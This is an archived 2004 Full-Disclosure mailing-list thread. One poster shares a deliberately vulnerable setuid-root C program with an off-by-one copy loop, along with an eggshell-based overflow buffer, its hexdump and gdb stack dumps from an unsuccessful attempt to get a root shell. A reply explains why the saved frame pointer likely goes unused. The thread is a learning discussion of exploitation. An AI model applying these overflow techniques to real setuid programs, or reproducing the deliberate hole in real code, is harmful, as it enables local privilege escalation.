[<prev] [next>] [day] [month] [year] [list]
Message-ID: <F21C7C637A79E84783A75AE36EAFE3DE02F30571@zbnalpex002.na.webmd.net>
From: Jason.Deckard at webmd.net (Deckard, Jason)
Subject: exploiting off by one
Hi Joe,
I don't think the value in ebp is being used by main's caller. As you know,
the calling convention requires the called procedure to preserve the state
of ebp, but that is no guarantee that the caller will use ebp to restore
esp.
Looking at a disassembled version of your code, I can see gcc (version 3.2.3
here) reclaims the parts of the stack used by parameters by increasing esp
with a constant value. For example:
lea 0xffffff78(%ebp),%eax
push %eax
call 80482c8
add $0x8,%esp
I suspect something similar is being done by main's caller. My apologies if
I'm missing something obvious here.
Regards,
Jason Deckard
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory
Sent: Thursday, April 15, 2004 2:26 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] exploiting off by one
hi fd,
i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm
trying to exploit an off by one overflow and have some questions, first see
what i did:
vulnerable program:
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 128
int main(int argc, char **argv) {
char buffer[BUFSIZE];
int i, bufsiz;
uid_t userid;
bufsiz = BUFSIZE;
userid = geteuid();
setuid(userid);
printf("userid: %i \n", userid);
printf("buffsize: %i \n", sizeof(buffer));
printf("buffsize: %i \n", bufsiz);
for(i=0;i<=sizeof(buffer);i++) {
buffer[i] = argv[1][i];
}
printf("buffsize: %i \n", strlen(buffer));
printf("buffer: %s\n", buffer);
return 0;
}
$ ls -l
-rwsr-xr-x 1 root wheel 7788 Apr 14 23:43 offbyone
STARTING EGGSHELL:
$ ./eggframeshell 134 68 1100
$EGG at: 0xcfbfd634
last_byte: 44
OVERFLOW BUFFER:
$ echo -n $IJV | hexdump -v
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444
0000080 4444 cfbf
0000084
$ gdb ./offbyone
GNU gdb 4.16.1
Copyright 1996 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-openbsd3.5"...
(gdb) break 21
warning: gdb ignores `const' qualifiers.
Breakpoint 1 at 0x667: file offbyone.c, line 21.
(gdb) run $IJV
Starting program: /./offbyone $IJV
userid: 1000
buffsize: 128
buffsize: 128
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21
21 printf("buffsize: %i \n", strlen(buffer));
(gdb) info frame
Stack level 0, frame at 0xcfbfd1c0:
eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1
called by frame at 0xcfbfd144
source language c.
Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220
Locals at 0xcfbfd1c0, Previous frame's sp is 0x0
Saved registers:
ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4
(gdb) x/100x $esp
0xcfbfd118: 0xcfbfd368 0xcfbfd220 0x00000001 0x00000000
0xcfbfd128: 0x00000000 0xcfbfd17c 0x48f31671 0x000003e8
0xcfbfd138: 0x00000080 0x00000081 0xcfbfd634 0xcfbfd634
0xcfbfd148: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd158: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd168: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd178: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd188: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd198: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd1a8: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd1b8: 0x4444d634 0x44444444 0xcfbfd144 0x000004b1
0xcfbfd1c8: 0x00000002 0xcfbfd220 0xcfbfd22c 0xcfbfd368
0xcfbfd1d8: 0xcfbfd1fc 0x00000385 0x0000049f 0x00000000
0xcfbfd1e8: 0xcfbfd21c 0x00001000 0x48f2e000 0x00000000
0xcfbfd1f8: 0x00000410 0xcfbfd21c 0x00000427 0x00000002
0xcfbfd208: 0xcfbfd220 0xcfbfd22c 0x00000000 0xcfbfdff0
0xcfbfd218: 0x00000000 0x00000002 0xcfbfd368 0xcfbfd374
0xcfbfd228: 0x00000000 0xcfbfd3f9 0xcfbfd424 0xcfbfd495
0xcfbfd238: 0xcfbfd4a3 0xcfbfd4b1 0xcfbfd4c9 0xcfbfd4dd
0xcfbfd248: 0xcfbfd4f4 0xcfbfd519 0xcfbfd536 0xcfbfd5bf
0xcfbfd258: 0xcfbfd5ca 0xcfbfd5dd 0xcfbfdddd 0x00000000
0xcfbfd268: 0x00000003 0x00000034 0x00000004 0x00000020
0xcfbfd278: 0x00000005 0x00000006 0x00000006 0x00001000
0xcfbfd288: 0x00000007 0x48f2e000 0x00000008 0x00000000
0xcfbfd298: 0x00000009 0x00000410 0x00000000 0x00000000
(gdb)
(gdb) x/x 0xcfbfd634
0xcfbfd634: 0x90909090
$ ./offbyone $IJV
userid: 0
buffsize: 128
buffsize: 128
buffsize: 134
buffer:
4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???
4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD????
$
hope its enough information. just my question is: i manipulated the least
significant byte of the frame pointer, pointing into my
buffer. there in my buffer is the address of my shellcode as the manipulated
returnaddress. but the program is not segfaulting, if
the pointer points to $somewhere. it always exits normally, without opening
a root shell to me.
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti overflow
protection disabled, "normal" overflow works well)
hope anybody can enlighten me.
joe
--
NEU : GMX Internet.FreeDSL
Ab sofort DSL-Tarif ohne Grundgeb?hr: http://www.gmx.net/info
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists